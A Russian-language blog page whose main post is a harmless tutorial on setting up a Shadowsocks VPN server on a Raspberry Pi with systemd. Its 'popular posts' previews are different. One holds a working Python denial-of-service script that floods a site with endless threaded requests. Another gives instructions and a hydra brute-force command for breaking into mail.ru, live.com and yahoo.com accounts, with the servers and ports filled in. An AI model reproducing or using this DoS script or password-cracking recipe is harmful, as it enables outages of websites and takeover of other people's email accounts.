Shadowsocks готовим домашний vpn на расберипай 2022

-

У нас в Армении очень чистый интернет. Насколько я знаю, понятия блокировка сайтов у нас в стране не существует, в отличии от большанства других стран СНГ. Поэтому я решил создать себе VPN сервер и дать его своим друзьям, чтобы они могли свободно пользоватся интернетом. Есть много разных сервисов для поднятия vpn сервиса, openvpn, wireguard итд, но мне кажется что они в большинстве своём имеют слишком широкий функционал чтобы запускать на встроеных устройствах. Если цель это просто обход блокировок, и шифрация промежуточного трафика то по моему shadowsocks самый лучший вариант.

Самый простой способ поставить шадоусокс на малину это использовать apt-get. Но в нём последний билд shadowsocks был в 2018 году. Поэтому лучше установить самому с гитхаба https://github.com/shadowsocks/shadowsocks-rust/. Кроме того, shadowsocks с тех пор переписывали с питона на си, а теперь и вовсе поддерживается только версия на rust.

Чтобы скачать нужно просто скачать tar архив с релизов билдов и распаковать. В релизах есть много билдов под разные архитектуры и libc. Если используете raspbian, то нужно искать билд с приставкой gnu. В моём случае на raspberry pi b+ 1 подошел билд shadowsocks-v1.15.0-alpha.9.armv7-unknown-linux-gnueabihf.tar.xz. Если распаковать и запустить билд с неподходящей архитектурой то сервер небзапустится и будет жаловатся на бинарник.

wget https://github.com/shadowsocks/shadowsocks-rust/releases/download/v1.15.0-alpha.9/shadowsocks-v1.15.0-alpha.9.armv7-unknown-linux-gnueabihf.tar.xz

tar -xzvf shadowsocks-v1.15.0-alpha.9.armv7-unknown-linux-gnueabihf.tar.xz

Для запуска сервера используется бинарник ssserver. Для настройки можно использовать флаги запуска, но лучше использовать конфиг https://shadowsocks.org/guide/configs.html

Я использовал такой конфиг. Далее нужно просто запустить сервер: ./ssserver и все должно работать:


На этом этапе VPN уже должен быть готов, если вы правильно настроили port forwarding на роутере, или uPnP. В моём случае я настроил uPnP через upnpc который можно установить через apt-get. В этом гайде рассматривается полная настройка uPnP.

Так-же нужно настроить systemd, чтобы он автоматически запускал ssserver при старте системы и перезапускал процесс если что-то пошло нетак. Для этого создаём конфиг /etc/systemd/system/shadowsocks.service 

[Unit]
Description=Shadowsocks
After=syslog.target network-online.target remote-fs.target nss-lookup.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/home/pi/ssserver --config /home/pi/config.json

[Install]
WantedBy=multi-user.target

Далее включаем сервис в список systemd: sudo service shadowsocks enable и стартуем sudo service shadowsocks start.


Комментарии

Отправить комментарий

Популярные сообщения из этого блога

DOS атака при помощи Python

-
Изображение
Для атак вида "DOS" используют один мощный сервер который посылает жертве столько запросов, что жертва не успевает обработать их и выдаёт ошибку 503 либо 504. Для атаки нужна многопоточность, то есть нужно чтобы скрипт отправлял запрос не ожидая завершения предыдущего. В Python для этого есть библиотека "therading". Пример простейшего скрипта для доса: # coding: utf8 import threading import requests def dos (): while True : requests . get( "http://example.com" ) while True : threading . Thread(target = dos) . start() Скрипт рекомендую запускать только на мощных компьютерах а ещё лучше на VPS сервере. Вот наш скрипт в действии: Так же советую попробовать новый ддос скрипт который использует вместо потоков асинхронный код
Далее...

Взлом почты mail.ru live.com и yahoo.com

-
Наш способ взлома будет брутафорс, для этого мы будем использовать хакерскую программу hydra, для взлома нам потребуется: мощный интернет (хотябы 70 мега бит в секунду) список паролей Этот метод взлома работает только в случае если пароль простой. Лист паролей можно выбрать, либо 500 паролей либо 10 000 , либо 10 миллионов . Я рекомендую 10 000, после скачивания и установки hydra в консоле нужно написать: hydra - l ящик _ который _ мы _ будем _ ломать @mail.ru - P passwordlist . txt - t 20 - s порт _ сервера - S - v - V smtp: // сервер для взлома Для взлома live.com либо yahoo.com: порт:  587 сервер для взлома:  smtp.live.com Для взлома mail.ru: сервер: smtp.mail.ru порт: 465 Для взлома yahoo: сервер: smtp.mail.yahoo.com порт:  587
Далее...

Ведем телеграм канал через питон

-
Изображение
Для создания ботов существует библиотека  aiogram . Но не всегда обязательно использовать ботов, вить иногда вам просто нужно посылать сообщения в канал с собственного имени. Для этого больше всего подходит библиотека  pyrogram . Устанавливаем её: pip install pyrogram Далее нужно создать телеграм приложение, от которого будут посылатся запросы. Создать приложение можно на  https://my.telegram.org/apps . После регистрации приложения должна появится такая форма: Как посылать сообщения в канал  from  pyrogram  import  Client api_id =  12345 api_hash =  "0123456789abcdef0123456789abcdef" with  Client( "my_account" , api_id, api_hash)  as  app:     app.send_message( "me" ,  "Greetings from **Pyrogram**!" ) Вместо api_id и api_hash нужно подставить свои данные, полученные при регистрации. Далее нужно ввести свой номер телефона, и ввести код который пришел на него. В этой же дирек...
Далее...